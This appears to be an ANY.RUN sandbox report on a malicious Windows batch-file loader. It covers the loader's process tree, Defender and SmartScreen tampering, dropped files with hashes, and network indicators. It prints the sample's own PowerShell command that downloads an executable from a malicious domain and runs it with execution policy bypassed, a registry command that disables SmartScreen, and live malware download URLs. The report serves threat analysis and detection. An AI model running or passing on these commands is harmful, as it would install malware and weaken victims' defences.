download:

/

Full analysis: https://app.any.run/tasks/ce63f561-1de8-4b6d-9000-1284c85f9fd2
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 30, 2025, 17:07:17
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
MD5:

2F334A5455D9CBC0D5A105CCF0D3752F

SHA1:

FF9833F7E643C758FF01A5334BF975594E3ABE89

SHA256:

FE798E2571E88BE870195A9A6099251B4C1A1A635FD5609A878903EF888E9893

SSDEEP:

24:QjenpzHO3I8BgAfpyyeGekVPe+e1u+5siJFk+bIV7449IHF+nAHU7q8WaseIpI3S:QEpCI8BnLe71roWI5YkqeI4Xsf609X

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6968)
      • powershell.exe (PID: 1792)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 6828)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 6828)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 1792)

    • Modifies exclusions in Windows Defender

      • mxz32.exe (PID: 5892)

    • Runs injected code in another process

      • mxz32.exe (PID: 5892)

    • Application was injected by another process

      • winlogon.exe (PID: 684)

  • SUSPICIOUS

    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 6332)
      • cmd.exe (PID: 6828)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6584)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 6584)
      • restore.exe (PID: 2280)
      • cmd.exe (PID: 6828)
      • sototal.exe (PID: 6288)
      • mxz32.exe (PID: 5892)

    • The process executes VB scripts

      • cmd.exe (PID: 6332)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 6584)
      • restore.exe (PID: 2280)
      • cmd.exe (PID: 6828)
      • sototal.exe (PID: 6288)
      • winlogon.exe (PID: 684)
      • mxz32.exe (PID: 5892)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6828)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6828)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 6828)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6828)

    • Probably download files using WebClient

      • cmd.exe (PID: 6828)

    • Creates file in the systems drive root

      • powershell.exe (PID: 1792)
      • restore.exe (PID: 2280)
      • cmd.exe (PID: 6828)
      • cmd.exe (PID: 3560)
      • sc.exe (PID: 6804)
      • sc.exe (PID: 6404)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 6828)

    • Reads security settings of Internet Explorer

      • restore.exe (PID: 2280)
      • sototal.exe (PID: 3612)
      • sototal.exe (PID: 6288)
      • ntsys32.exe (PID: 6908)
      • mxz32.exe (PID: 5892)

    • Checks Windows Trust Settings

      • restore.exe (PID: 2280)

    • Process requests binary or script from the Internet

      • restore.exe (PID: 2280)

    • Executable content was dropped or overwritten

      • restore.exe (PID: 2280)
      • powershell.exe (PID: 1792)
      • sototal.exe (PID: 3612)
      • sototal.exe (PID: 6288)
      • ntsys32.exe (PID: 6908)
      • mxz32.exe (PID: 5892)
      • update64.exe (PID: 836)

    • Application launched itself

      • cmd.exe (PID: 6828)

    • Reads the date of Windows installation

      • sototal.exe (PID: 3612)
      • sototal.exe (PID: 6288)
      • ntsys32.exe (PID: 6908)
      • mxz32.exe (PID: 5892)

    • Executes as Windows Service

      • sc.exe (PID: 6804)

    • Creates or modifies Windows services

      • sc.exe (PID: 6404)
      • SysScnet.exe (PID: 6876)

    • Executes application which crashes

      • sc.exe (PID: 6804)

    • Potential Corporate Privacy Violation

      • ntsys32.exe (PID: 6908)

    • Connects to unusual port

      • winlogon.exe (PID: 684)

  • INFO

    • Starts MODE.COM to configure console settings

      • mode.com (PID: 6400)
      • mode.com (PID: 6900)
      • mode.com (PID: 6944)

    • Checks supported languages

      • mode.com (PID: 6400)
      • mode.com (PID: 6900)
      • mode.com (PID: 6944)
      • sototal.exe (PID: 3612)
      • restore.exe (PID: 2280)
      • sc.exe (PID: 6404)
      • sc.exe (PID: 6804)
      • sototal.exe (PID: 6288)
      • ntsys32.exe (PID: 6908)
      • SysScnet.exe (PID: 6876)
      • mxz32.exe (PID: 5892)
      • update64.exe (PID: 836)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6968)

    • Checks proxy server information

      • powershell.exe (PID: 1792)
      • restore.exe (PID: 2280)
      • ntsys32.exe (PID: 6908)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6968)

    • Reads the machine GUID from the registry

      • restore.exe (PID: 2280)

    • Creates files or folders in the user directory

      • restore.exe (PID: 2280)

    • Reads the software policy settings

      • restore.exe (PID: 2280)
      • WerFault.exe (PID: 5988)

    • Process checks computer location settings

      • restore.exe (PID: 2280)
      • sototal.exe (PID: 3612)

    • Create files in a temporary directory

      • restore.exe (PID: 2280)
      • sototal.exe (PID: 3612)

    • Reads the computer name

      • restore.exe (PID: 2280)
      • sototal.exe (PID: 3612)
      • sc.exe (PID: 6404)
      • sototal.exe (PID: 6288)
      • sc.exe (PID: 6804)
      • SysScnet.exe (PID: 6876)
      • mxz32.exe (PID: 5892)
      • ntsys32.exe (PID: 6908)
      • update64.exe (PID: 836)

    • Disables trace logs

      • powershell.exe (PID: 1792)

    • Reads security settings of Internet Explorer

      • winlogon.exe (PID: 684)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-8 encoded (100)
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
168
Monitored processes
35
Malicious processes
9
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs mode.com no specs cacls.exe no specs wscript.exe no specs cmd.exe conhost.exe no specs mode.com no specs cacls.exe no specs mode.com no specs powershell.exe no specs reg.exe no specs powershell.exe timeout.exe no specs restore.exe sototal.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs sc.exe no specs conhost.exe no specs sc.exe sototal.exe werfault.exe sysscnet.exe no specs conhost.exe no specs ntsys32.exe cmd.exe no specs conhost.exe no specs mxz32.exe update64.exe cmd.exe no specs conhost.exe no specs winlogon.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
684winlogon.exeC:\Windows\System32\winlogon.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Logon Application
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\winlogon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
836"C:\WINDOWS\TEMP\update64.exe" C:\Windows\Temp\update64.exe
mxz32.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Exit code:
0
Modules
Images
c:\windows\temp\update64.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
1556reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
1792powershell -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('https://56561234.com/passwork23.exe', 'C:\restore.exe')" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2280C:\restore.exe C:\restore.exe
cmd.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
1, 0, 0, 1
Modules
Images
c:\restore.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
2464\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3188\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3560C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\uewnmwe23total.bat" "C:\Windows\SysWOW64\cmd.exerestore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
3612"C:\Users\admin\AppData\Local\Temp\sototal.exe" C:\Users\admin\AppData\Local\Temp\sototal.exe
restore.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\sototal.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
57 003
Read events
56 623
Write events
377
Delete events
3

Modification events

(PID) Process:(6332) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
(PID) Process:(6584) wscript.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.FriendlyAppName
Value:
Windows Command Processor
(PID) Process:(6584) wscript.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.ApplicationCompany
Value:
Microsoft Corporation
(PID) Process:(1556) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SmartScreenEnabled
Value:
Off
(PID) Process:(2280) restore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2280) restore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2280) restore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2280) restore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch
Operation:writeName:Version
Value:
WS not running
(PID) Process:(6404) sc.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\com1096
Operation:writeName:Type
Value:
272
(PID) Process:(6288) sototal.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\NetWorkProNT32
Operation:writeName:VERSION Value
Value:
20041
Executable files
14
Suspicious files
28
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
6288sototal.exe\Device\Harddisk0\DR0
MD5:
SHA256:
6332cmd.exeC:\Users\admin\AppData\Local\Temp\getadmin.vbstext
MD5:D14A6C18536B08C2D91CC10129CEC2CA
SHA256:88F0E55BE41422957E8F4FEC8CAF0F9ED4E68D1F0290171BA8F4BD26C19FA17D
3612sototal.exeC:\Users\admin\AppData\Local\Temp\sc.exeexecutable
MD5:5DF9508ABF76740F92C4217AE44737F4
SHA256:C455D6C5D1D48DB2A3681CE67B8701993A8339AE9782AD13AB7FD0C9924BCC01
6288sototal.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbbinary
MD5:D381BA1D7301EE4A3FF6B45CAF06A61E
SHA256:7097256D0BC9B213699D5B98717044114FBCC73BE3D5238F2B42365245F5C939
6288sototal.exeC:\Windows\SysScnet.exeexecutable
MD5:42B1CCF8D29F944CFA4182FA37B4CCEF
SHA256:E6E21BE3E08D078ACA56895EE92AF7580672B95798F41E84D98566AB2CB5A2E2
1792powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3ljx5hgx.fvd.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2280restore.exeC:\Users\admin\AppData\Local\Temp\sototal.exeexecutable
MD5:6480FC6B662D796DED1DDF6AC709F9A0
SHA256:B174254E544EF9AB969C83214B1D6E768EF3DA8736204DB65F361280BBB0D8D5
6968powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vs22qted.akx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6968powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2p0gfry3.m1w.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1792powershell.exeC:\restore.exeexecutable
MD5:1F37D8B59C185CA1673A91F80CB703D6
SHA256:829C03AFFA1E4736D29E18D79071D93F11174325C104CC54C4A86E86CF637183
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
37
DNS requests
24
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5064
SearchApp.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
7156
SIHClient.exe
GET
200
104.76.201.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2280
restore.exe
GET
200
142.250.181.227:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
5988
WerFault.exe
GET
200
104.79.89.142:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5988
WerFault.exe
GET
200
184.24.77.35:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6908
ntsys32.exe
GET
200
210.129.184.71:80
http://co325612.com/0109b3/aa.dat
unknown
malicious
7156
SIHClient.exe
GET
200
104.76.201.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
1176
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2280
restore.exe
GET
301
172.67.184.93:80
http://56561234.com/11111/pop/aso64.exe
unknown
malicious
2280
restore.exe
GET
200
142.250.181.227:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.21.65.154:443
www.bing.com
Akamai International B.V.
NL
whitelisted
1076
svchost.exe
23.218.210.69:443
go.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:137
whitelisted
5064
SearchApp.exe
2.21.65.132:443
www.bing.com
Akamai International B.V.
NL
whitelisted
5064
SearchApp.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
7156
SIHClient.exe
4.245.163.56:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7156
SIHClient.exe
104.76.201.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
7156
SIHClient.exe
52.165.164.15:443
fe3cr.delivery.mp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
go.microsoft.com
  • 23.218.210.69
whitelisted
www.bing.com
  • 2.21.65.132
  • 2.21.65.154
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
www.microsoft.com
  • 104.76.201.160
  • 104.79.89.142
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
login.live.com
  • 40.126.31.131
  • 40.126.31.73
  • 40.126.31.71
  • 40.126.31.3
  • 20.190.159.75
  • 40.126.31.69
  • 20.190.159.0
  • 40.126.31.0
whitelisted
56561234.com
  • 172.67.184.93
  • 104.21.19.5
malicious
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
c.pki.goog
  • 142.250.181.227
whitelisted

Threats

PID
Process
Class
Message
2280
restore.exe
A Network Trojan was detected
ET MALWARE Possible Malicious Macro EXE DL AlphaNumL
2280
restore.exe
A Network Trojan was detected
ET MALWARE Possible Malicious Macro DL EXE Feb 2016
6908
ntsys32.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
6908
ntsys32.exe
Misc activity
ET INFO Packed Executable Download
6908
ntsys32.exe
Misc activity
ET HUNTING Suspicious Windows Executable WriteProcessMemory
6908
ntsys32.exe
Misc activity
ET HUNTING Suspicious Windows Executable CreateRemoteThread
6908
ntsys32.exe
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
6908
ntsys32.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
Process
Message
restore.exe
winsystem message Ok.